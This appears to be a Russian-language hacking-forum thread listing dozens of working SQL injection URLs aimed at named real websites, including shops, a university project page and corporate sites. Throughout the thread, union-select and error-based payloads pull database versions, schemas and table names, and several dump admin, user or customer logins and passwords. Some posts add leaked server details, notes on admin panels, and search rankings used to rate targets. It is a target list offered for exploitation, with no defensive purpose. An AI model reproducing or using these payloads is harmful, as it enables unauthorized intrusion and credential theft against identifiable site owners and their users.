SQL Инъекции

http://info.bear.ru/index.php?gid=-41+union+Select+1,2,3--
ТИЦ : 80

http://www.delovod.info/view.php?page=1&id=6+and+1=0+union+select+1,2,version()--

http://www.dalstroy.ru/?id=4+group+by+7--
ТИЦ : 10

http://www.tmgrupo.ru/info.php?id_article=-5+union+select+version(),2--
PR: 3

http://www.kam-ur.info/subgroup.php?gr=6+and+1=0+union+select+group_concat(schema_name)+from+information_schema.schemata--

 

Kusto #13026
http://www.openworld.gov/hosts/city.php?id=257&lang=2+and+1=0+union+select+1,concat(username,char (58),user_password)+from+phpbb_users+--+
-------------------------------------------------------------------------
-------------------------------------------------------------------------
было вот здесь #6097
https://forum.antichat.ru/showthread.php?p=788711

 

http://www.livecharts.mobi/news/news_item.php?id=-3388244+union+select+1,concat_ws(0x3a3a3a,user(),database(),version()),3,4,5,6,7,8,9,10,11--

 

http://www.sadarvuga.com/php/project.php?id=-59+union+select+concat(username,char(58),password)+from+users+--+

http://www.velotaxi.com/php/main.php?id=1+union+select+1,2,3+--+

http://www.marqueesole.com/php/client/product.php?id=-319+union+select+concat(login,char(58),passwd)%20+from+admin+--+

 

интернет-магазин Matras-Land

http://www.matras-land.ru/index.php?arts=-46+and+1=2+union+select+1,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),3--

version : 5.0.90-log
user : [email protected]
database : u202662_3
os : portbld-freebsd7.3

 

http://www.sanjuandelrio.com.mx/postales/postal.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5--

 

http://zupanet.com.s16.evanzo-server.de/modules.php?name=eGallery&file=index&op=showpic&pi%20%20%20d=-%20%209999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,%20%20aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

 

Code:

https://www.nyu.edu/projects/mednar/play.php?id=-82+UNION+SELECT+concat_ws(0x3a,user(),version(),database())--

Username: [email protected]
Version: 5.1.32-log
Database: mednar

Google PR: 8

 

PHP:

http://www.wanted-one.ru/prepod.php?id=-2+UnIon+selECt+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x50485042425F5553455253--+

 

http://d-two.ru/?news=1+and+1=0+union+select+1,2,concat_ws(0x3a,ID,USERNAME,PASSWORD),4,5,6+from+user+--+
/admin.php

view-source:http://www.bekesmatrix.hu/index.php?contentSite=news&itemId=42059+and+1=0+union+Select+group_concat(table_name)+from+information_Schema.tables+where+table_schema=0x62656b65736d6174726978--
PR: 3

http://elecom.net.ru/production/?type=2+and+1=0+union+select+1,group_concat(schema_name)+from+information_schema.schemata--
ТИЦ : 90 PR: 2

http://ydachnik.by/catalog/?buy=-253+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17+--+
ТИЦ : 10

http://www.agun.kz/?id=21+and+1=0+union+select+1,2,3,version(),5,6,7,8,9,10+--+&lang=kz
ТИЦ : 100

 

Шопы!

Шопы:​

ТИЦ20(R2) PR2

ТИЦ20(R2) PR3

ТИЦ20(R2) PR3 Разработчик сайтов, куча уязвимых работ в портфолио

ТИЦ10(R2) PR2

ТИЦ10YC(R2) PR1

ТИЦ50YC(R3)(CY=www.ksenon.ru) PR3

 

http://www.krona-ross.perm.ru/index.php?page=production&id=13+and+1=0+union+select+version(),2--
ТИЦ : 10

http://dom.webc.ru/index.php?m=news_show_one&id=2+and+1=0+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata--
ТИЦ : 20

http://mb-opt.ru/razdel.php?cat=stylia+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
ТИЦ : 20

 

www.jonnyhost.com/templates/show.php?id=25'+and+1=0+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=0x6475727262616e5f636f6e74726f6c--+
Корявые хостеры , доступа к tbladmins нету вроде
PR: 2

http://www.calligraphy.mvk.ru/?idx=1724+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,login,password),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users--+
Админку не нашел, хотя это лишь поддомен
ТИЦ : 350

 

http://www.vsmpo.ru/cat_details.php?script=news.php&p=&zps=1419'+and+1=0+union+select+1,2,3,group_concat(table_name+separator+'%3Cbr%3E'),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=0x76736d706f--+

ТИЦ : 750

Sajeys, сайты nzshv.ru ilove.cz уже были

 

Code:

http://www.eia.org.uk/view.php?id=1422+union+select+1,version(),3,4

Тиц 10 Pr 7

 

http://www.ids-imaging.de/frontend/products.php?cam_id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51
http://www.photonfocus.de/html/eng/products/products.php?prodId=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28,29
http://www.funktechnik24.de/funktech/shop/artikel.php?id=-664+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&cat=10
http://www.schaben-spinnen.de/Content/shop.php?cat=-13+union+select+1,version()
http://www.hm-leder.de/shop/product_info.php?cPath=195_223&products_id=-2237'+union+select+1,2,aes_decrypt(aes_encrypt(customers_email_address,char(58),customers_password,1),1)+from+customers--+
http://www.pinled.de/shop/product_info.php?products_id=1'+or+(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
http://avfrisia.de/neu/index.php?id=-7+union+select+aes_decrypt(aes_encrypt(version(),1),1)+from+user
http://www.kromas.de/en/products.asp?id0=232&id=247&id2=282+or+(select+1+from+msysaccessobjects+group+by+mid((rnd(0)*2),1))%00
http://www.fosterrefrigerator.de/Foster-products.asp?id=322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+MSysAccessXML
http://www.filantex.de/products.asp?l=en&Id=459+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+msysaccessobjects
http://www.traynoramps.com/products.asp?id=170+and+1=(select+top+1+Password+from+UTILIS_users+where+user_name='jbelardo')&cat=63&type=3
http://tetraguncare.de/product_view.asp?ID=11+and+1=(select+top+1+@@version+from+tblUsers)
http://www.religioesebuecher.de/clients/santiago/products.asp?ProductID=13256+and+1=@@version

 

PHP:

http://www.eia.org.uk/view.php?id=-594+union+select+1,version(),3,4--

PHP:

http://www.lostbombers.co.uk/bomber.php?id=-777+union+select+1,version(),3,4,5,6,7,8,9--

PHP:

http://startplus.ru/about/news/?nid=-54+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user(),database(),version()))),5--

PHP:

http://www.infobetting.com/bookmakers/news.php?id=-370+union+select+1,2,3,4,5,group_concat(table_name),7,8+from+information_schema.tables--

PHP:

http://www.batathailand.com/news/news.php?id=-75+union+select+1,concat_ws(0x3a,us_id,us_gr_id,us_login,us_password,us_email,us_fname,us_lname,us_company,us_ri_id,us_createddate,us_modifieddate,us_lastlogon,us_modified,us_deleted,us_ts,us_id,us_gr_id,us_login,us_password,us_email,us_fname,us_lname,us_company,us_ri_id,us_createddate,us_modifieddate,us_lastlogon,us_modified,us_deleted,us_ts),3,4,5,6,7+from+a_users_f--

 

тиц 140

вообще нелепо скулю с Эмиком нашли, он кидает сайт что бы я софт скачал,а я случайно точку влепил =))) и скуля вылезла.

сайт по секьюрити и хаку

 

Code:

http://www.pet-id.ru/index.php?idm=25&page=33+union+select+1,2,version()--

ТИц 110

 

http://rondell-shop.ru/catalog.php?cat=2+and+1=0+union+select+1,version(),3,4,5,6,7+--+&PHPSESSID=a6b2ca635e534385e6b1c8708b7af928

http://fontan.su/?level=1&id=2+and+1=0+union+select+version(),2,3+--+

http://bigeasysportswear.com/details.php?catid=3&subcatid=12&id=3+and+1=0+UnIon+selECt+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables+where+table_schema=0x777777626967655f626967--+